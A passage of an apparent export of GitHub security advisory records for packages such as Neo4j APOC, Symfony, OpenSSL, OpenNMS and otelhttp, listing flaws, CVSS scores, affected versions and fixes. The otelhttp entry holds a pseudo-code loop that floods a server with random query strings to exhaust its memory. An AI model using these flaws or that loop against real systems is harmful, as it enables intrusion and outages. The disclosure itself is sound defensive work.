read local files, send HTTP requests, and perform denial-of-service attacks on the application. Abusing the XXE vulnerability enabled assessors to read local files remotely. Although with the level of privileges assessors had this was limited to one-line files. With the ability to write to the database, any file could have been read. Additionally, assessors noted, with local testing, the server could be crashed by passing in improperly formatted XML. ### Patches The users should aim to use the latest released version compatible with their Neo4j version. The minimum versions containing patch for this vulnerability is 5.5.0. ### Workarounds If you cannot upgrade the library, you can control the [allowlist](https://neo4j.com/docs/operations-manual/current/reference/configuration-settings/#config_dbms.security.procedures.allowlist) of the procedures that can be used in your system. ### For more information If you have any questions or comments about this advisory: * Open an issue in [neo4j-apoc](https://github.com/neo4j/apoc) * Email us at [security@neo4j.com](mailto:security@neo4j.com) ### Credits We want to publicly recognise the contribution of Christopher Schneider – State Farm. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.5.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/neo4j/apoc/security/advisories/GHSA-6wxg-wh7f-rqpr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23926'}, {'type': 'WEB', 'url': 'https://github.com/neo4j/apoc/pull/310'}, {'type': 'WEB', 'url': 'https://github.com/neo4j/apoc/commit/f175f1f1f663d29fc151c297b56d154255eb7016'}, {'type': 'PACKAGE', 'url': 'https://github.com/neo4j/apoc'}, {'type': 'WEB', 'url': 'https://github.com/neo4j/apoc/releases/tag/5.5.0'}, {'type': 'WEB', 'url': 'https://neo4j.com/docs/operations-manual/current/reference/configuration-settings/#config_dbms.security.procedures.allowlist'}]","{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T20:46:49Z', 'nvd_published_at': '2023-02-16T16:15:00Z'}" 1.4.0,GHSA-2q79-56rq-8v3c,2023-03-03T22:55:46Z,2023-02-21T18:30:17Z,,['CVE-2017-20178'],Codiad information disclosure vulnerability,A vulnerability was found in Codiad 2.8.0. It has been rated as problematic. Affected by this issue is the function saveJSON of the file components/install/process.php. The manipulation of the argument data leads to information disclosure. The attack may be launched remotely. Upgrading to version 2.8.1 is able to address this issue. The name of the patch is 517119de673e62547ee472a730be0604f44342b5. It is recommended to upgrade the affected component. VDB-221498 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'codiad/codiad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-20178'}, {'type': 'WEB', 'url': 'https://github.com/Codiad/Codiad/pull/974'}, {'type': 'WEB', 'url': 'https://github.com/Codiad/Codiad/commit/517119de673e62547ee472a730be0604f44342b5'}, {'type': 'PACKAGE', 'url': 'https://github.com/Codiad/Codiad'}, {'type': 'WEB', 'url': 'https://github.com/Codiad/Codiad/releases/tag/v.2.8.1'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.221498'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.221498'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:55:46Z', 'nvd_published_at': '2023-02-21T18:15:00Z'}" 1.4.0,GHSA-3gv2-29qc-v67m,2023-02-15T17:39:12Z,2023-02-01T18:48:06Z,,['CVE-2022-24895'],Symfony vulnerable to Session Fixation of CSRF tokens,"Description ----------- When authenticating users Symfony by default regenerates the session ID upon login, but preserves the rest of session attributes. Because this does not clear CSRF tokens upon login, this might enables [same-site attackers](https://canitakeyoursubdomain.name/) to bypass the CSRF protection mechanism by performing an attack similar to a session-fixation. Resolution ---------- Symfony removes all CSRF tokens from the session on successful login. The patch for this issue is available [here](https://github.com/symfony/symfony/commit/5909d74ecee359ea4982fcf4331aaf2e489a1fd4) for branch 4.4. Credits ------- We would like to thank Marco Squarcina for reporting the issue and Nicolas Grekas for fixing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '4.4.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.4.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '4.4.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.4.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-3gv2-29qc-v67m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24895'}, {'type': 'WEB', 'url': 'https://github.com/symfony/security-bundle/commit/076fd2088ada33d760758d98ff07ddedbf567946'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/5909d74ecee359ea4982fcf4331aaf2e489a1fd4'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-bundle/CVE-2022-24895.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2022-24895.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00014.html'}, {'type': 'WEB', 'url': 'https://symfony.com/cve-2022-24895'}]","{'cwe_ids': ['CWE-384', 'CWE-613'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T18:48:06Z', 'nvd_published_at': '2023-02-03T22:15:00Z'}" 1.4.0,GHSA-wxfj-84xf-7gxv,2023-03-08T23:14:00Z,2023-02-28T06:30:25Z,,['CVE-2023-26105'],mde utilities contains Prototype Pollution,All versions of the package utilities are vulnerable to Prototype Pollution via the _mix function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'utilities'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26105'}, {'type': 'WEB', 'url': 'https://github.com/mde/utilities/issues/29'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-UTILITIES-3184491'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-06T21:55:12Z', 'nvd_published_at': '2023-02-28T05:15:00Z'}" 1.4.0,GHSA-79jr-8fhm-8wv3,2023-03-03T23:19:18Z,2023-02-22T21:30:39Z,,['CVE-2023-0846'],OpenNMS Horizon and Meridian vulnerable to Cross-site Scripting,"Unauthenticated, stored cross-site scripting in the display of alarm reduction keys in multiple versions of OpenNMS Horizon and Meridian could allow an attacker access to confidential session information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '31.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0846'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/5506/files'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2022/releasenotes/changelog.html#releasenotes-changelog-Meridian-2022.1.13'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}, {'type': 'WEB', 'url': 'https://issues.opennms.org/browse/NMS-14877'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T22:59:29Z', 'nvd_published_at': '2023-02-22T19:15:00Z'}" 1.4.0,GHSA-vxrh-cpg7-8vjr,2023-02-21T19:59:13Z,2023-02-08T22:22:12Z,,['CVE-2023-0217'],openssl-src subject to NULL dereference validating DSA public key,"An invalid pointer dereference on read can be triggered when an application tries to check a malformed DSA public key by the `EVP_PKEY_public_check()` function. This will most likely lead to an application crash. This function can be called on public keys supplied from untrusted sources which could allow an attacker to cause a denial of service attack. The TLS implementation in OpenSSL does not call this function but applications might call the function if there are additional security requirements imposed by standards such as FIPS 140-3. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0217'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=23985bac83fd50c8e29431009302b5442f985096'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0012.html'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230207.txt'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:22:12Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-jrwr-5x3p-hvc3,2023-03-06T19:44:07Z,2023-02-23T00:30:40Z,,['CVE-2023-26302'],markdown-it-py Denial of Service vulnerability in the command line interface,"Denial of service could be caused to the command line interface of markdown-it-py, before v2.2.0, if an attacker was allowed to use invalid UTF-8 characters as input.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'markdown-it-py'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26302'}, {'type': 'WEB', 'url': 'https://github.com/executablebooks/markdown-it-py/pull/247'}, {'type': 'WEB', 'url': 'https://github.com/executablebooks/markdown-it-py/commit/53ca3e9c2b9e9b295f6abf7f4ad2730a9b70f68c'}, {'type': 'PACKAGE', 'url': 'https://github.com/executablebooks/markdown-it-py'}, {'type': 'WEB', 'url': 'https://github.com/executablebooks/markdown-it-py/releases/tag/v2.2.0'}]","{'cwe_ids': ['CWE-173'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T19:40:54Z', 'nvd_published_at': '2023-02-22T23:15:00Z'}" 1.4.0,GHSA-h685-83w4-3ph3,2023-02-22T00:10:03Z,2023-02-21T15:30:23Z,,['CVE-2021-32860'],iziModal Cross-site Scripting vulnerability,"iziModal is a modal plugin with jQuery. Versions prior to 1.6.1 are vulnerable to cross-site scripting (XSS) when handling untrusted modal titles. An attacker who is able to influence the field `title` when creating a `iziModal` instance is able to supply arbitrary `html` or `javascript` code that will be rendered in the context of a user, potentially leading to `XSS`. Version 1.6.1 contains a patch for this issue","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'izimodal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32860'}, {'type': 'WEB', 'url': 'https://github.com/marcelodolza/iziModal/issues/249'}, {'type': 'WEB', 'url': 'https://github.com/marcelodolza/iziModal/commit/01728ac52bac5c1b4512087dafe0ad8b091fdc9e'}, {'type': 'PACKAGE', 'url': 'https://github.com/marcelodolza/iziModal'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1044_iziModal/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:10:03Z', 'nvd_published_at': '2023-02-21T15:15:00Z'}" 1.4.0,GHSA-h8p2-8g72-qpgh,2023-03-06T21:58:46Z,2023-02-24T12:31:20Z,,['CVE-2023-25692'],Apache Airflow Google Provider Improper Input Validation vulnerability,Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-google'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25692'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29499'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/ks4l78l5rwdpmvfn7y7yhs179nyxtlsh'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:25:37Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}" 1.4.0,GHSA-fj78-2vc5-f6cm,2023-02-22T00:05:05Z,2023-02-22T00:05:05Z,,['CVE-2023-25805'],Versionn Command Injection Vulnerability,"### Impact Command Injection Vulnerability. All versions <1.1.0 are affected. ### Patches Please upgrade to versionn@1.1.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'versionn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/commenthol/versionn/security/advisories/GHSA-fj78-2vc5-f6cm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25805'}, {'type': 'WEB', 'url': 'https://github.com/commenthol/versionn/commit/2ca128823efe962b37f2698f0eb530c2b124842d'}, {'type': 'PACKAGE', 'url': 'https://github.com/commenthol/versionn'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:05:05Z', 'nvd_published_at': '2023-02-20T16:15:00Z'}" 1.4.0,GHSA-5r5m-65gx-7vrh,2023-06-13T23:47:42Z,2023-02-08T22:32:16Z,,['CVE-2023-25151'],otelhttp and otelbeego have DoS vulnerability for high cardinality metrics,"### Impact The [v0.38.0](https://github.com/open-telemetry/opentelemetry-go-contrib/releases/tag/v1.13.0) release of [`go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp`](https://github.com/open-telemetry/opentelemetry-go-contrib/blob/463c2e7cd69d25f40b0a595b05394eeb26c68ae2/instrumentation/net/http/otelhttp/handler.go#L218) uses the [`httpconv.ServerRequest`](https://github.com/open-telemetry/opentelemetry-go/blob/v1.12.0/semconv/internal/v2/http.go#L159) function to annotate metric measurements for the `http.server.request_content_length`, `http.server.response_content_length`, and `http.server.duration` instruments. The `ServerRequest` function sets the `http.target` attribute value to be the whole request URI (including the query string)[^1]. The metric instruments do not ""forget"" previous measurement attributes when `cumulative` temporality is used, this means the cardinality of the measurements allocated is directly correlated with the unique URIs handled. If the query string is constantly random, this will result in a constant increase in memory allocation that can be used in a denial-of-service attack. Pseudo-attack: ``` for infinite loop { r := generate_random_string() do_http_request(""/some/path?random=""+r) } ``` ### Patches - `go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp` - v0.39.0 - `go.opentelemetry.io/contrib/instrumentation/github.com/astaxie/beego/otelbeego` - v0.39.0 [^1]: https://github.com/open-telemetry/opentelemetry-go/blob/6cb5718eaaed5c408c3bf4ad1aecee5c20ccdaa9/semconv/internal/v2/http.go#L202-L208","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.38.0'}, {'fixed': '0.39.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'go.opentelemetry.io/contrib/instrumentation/github.com/astaxie/beego/otelbeego'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.38.0'}, {'fixed': '0.39.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/open-telemetry/opentelemetry-go-contrib/security/advisories/GHSA-5r5m-65gx-7vrh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25151'}, {'type': 'PACKAGE', 'url': 'https://github.com/open-telemetry/opentelemetry-go-contrib'}, {'type': 'WEB', 'url': 'https://github.com/open-telemetry/opentelemetry-go/blob/v1.12.0/semconv/internal/v2/http.go#L159'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:32:16Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-mrrw-grhq-86gf,2023-02-28T20:30:10Z,2023-02-28T20:30:10Z,,[],Ascii (crate) allows out-of-bounds array indexing in safe code,"Affected version of this crate had implementation of `From<&mut AsciiStr>` for `&mut [u8]` and `&mut str`. This can result in out-of-bounds array indexing in safe code. The flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ascii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.0'}, {'fixed': '0.9.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tomprogrammer/rust-ascii/issues/64'}, {'type': 'WEB', 'url': 'https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc'}, {'type': 'PACKAGE', 'url': 'https://github.com/tomprogrammer/rust-ascii'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0015.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T20:30:10Z', 'nvd_published_at': None}" 1.4.0,GHSA-h45f-rjvw-2rv2,2023-02-08T20:54:38Z,2023-02-01T12:32:41Z,2023-02-02T19:26:25Z,[],Withdrawn: wallabag subject to Improper Authorization,"## Duplicate advisory This advisory has been withdrawn because it is a duplicate of [GHSA-qwx8-mxxx-mg96](https://github.com/advisories/GHSA-qwx8-mxxx-mg96). This link is maintained to preserve external references. ## Original Description Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.1'}, {'fixed': '2.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0609'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/0f7460dbab9e29f4f7d2944aca20210f828b6abb'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3adef66f-fc86-4e6d-a540-2ffa59342ff0'}]","{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T19:26:25Z', 'nvd_published_at': '2023-02-01T12:15:00Z'}" 1.4.0,GHSA-p2hp-3wv3-4w74,2023-03-08T17:22:31Z,2023-02-24T21:30:18Z,,['CVE-2022-44310'],ecdh vulnerable to Exposure of Resource to Wrong Sphere,"In Development IL ecdh before 0.2.0, an attacker can send an invalid point (not on the curve) as the public key, and obtain the derived shared secret.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ecdh'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44310'}, {'type': 'WEB', 'url': 'https://github.com/developmentil/ecdh/issues/3'}, {'type': 'WEB', 'url': 'https://github.com/developmentil/ecdh/pull/4'}, {'type': 'WEB', 'url': 'https://github.com/developmentil/ecdh/commit/ef4560e7233f4e8107a17a77bc540121599c78fa'}, {'type': 'PACKAGE', 'url': 'https://github.com/developmentil/ecdh'}]","{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:22:31Z', 'nvd_published_at': '2023-02-24T20:15:00Z'}" 1.4.0,GHSA-q3r2-23r8-wqr9,2023-03-08T17:21:27Z,2023-02-26T06:30:15Z,,['CVE-2023-26091'],frp_form_answers allows Cross-site Scripting,"The frp_form_answers (aka Forms Export) extension before 3.1.2, and 4.x before 4.0.2, for TYPO3 allows XSS via saved emails.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'frappant/frp-form-answers'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'frappant/frp-form-answers'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26091'}, {'type': 'WEB', 'url': 'https://github.com/frappant/frp_form_answers/commit/39fa16c8c792abdfc33e38bae17847364ff6a71d'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/frappant/frp-form-answers/CVE-2023-26091.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/frappant/frp_form_answers'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2023-002'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:21:27Z', 'nvd_published_at': '2023-02-26T05:15:00Z'}" 1.4.0,GHSA-mv37-xrmc-hf64,2023-02-22T00:10:33Z,2023-02-21T15:30:23Z,,['CVE-2021-32856'],Microweber Cross-site Scripting vulnerability,"Microweber is a drag and drop website builder and content management system. Versions 1.2.12 and prior are vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor. A fix was attempted in versions 1.2.9 and 1.2.12, but it is incomplete.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32856'}, {'type': 'WEB', 'url': 'https://github.com/microweber/microweber/commit/f3b86d59ab674dbf514f9f9948ddfa091739ab75'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1005-Microweber/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:10:33Z', 'nvd_published_at': '2023-02-21T15:15:00Z'}" 1.4.0,GHSA-4gj3-6r43-3wfc,2023-02-17T20:32:08Z,2023-02-10T19:54:14Z,,['CVE-2023-23631'],IPFS go-unixfsnode subject to DOS via HAMT Decoding Panics,"## Impact Trying to read malformed HAMT sharded directories can cause panics and virtual memory leaks. If you are reading untrusted user input, an attacker can then trigger a panic. This is caused by a bogus fanout parameter in the HAMT directory nodes. This includes checks returned in [ipfs/go-bitfield GHSA-2h6c-j3gf-xp9r](https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r), as well as limiting the fanout to <= 1024 (to avoid attempts of arbitrary sized allocations). ## Patches - https://github.com/ipfs/go-unixfsnode/commit/91b3d39d33ef0cd2aff2c95d50b2329350944b68 - https://github.com/ipfs/go-unixfsnode/commit/a4ed723727e0bdc2277158337c2fc0d82802d122 ## References * https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778 * https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-unixfsnode'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/security/advisories/GHSA-4gj3-6r43-3wfc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23631'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/59050ea8bc458ae55246ae09243e6e165923e076'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/91b3d39d33ef0cd2aff2c95d50b2329350944b68'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/a4ed723727e0bdc2277158337c2fc0d82802d122'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/go-unixfsnode'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1559'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T19:54:14Z', 'nvd_published_at': '2023-02-09T21:15:00Z'}" 1.4.0,GHSA-9xm8-8qvc-vw3p,2023-02-07T22:41:28Z,2023-02-07T22:41:28Z,,['CVE-2020-29242'],Denial of Service in dhowden/tag,dhowden tag before 0.0.0-20201120070457-d52dcb253c63 allows `panic: runtime error: index out of range` via readPICFrame.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/dhowden/tag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20201120070457-d52dcb253c63'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29242'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/77'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/78'}, {'type': 'WEB', 'url': 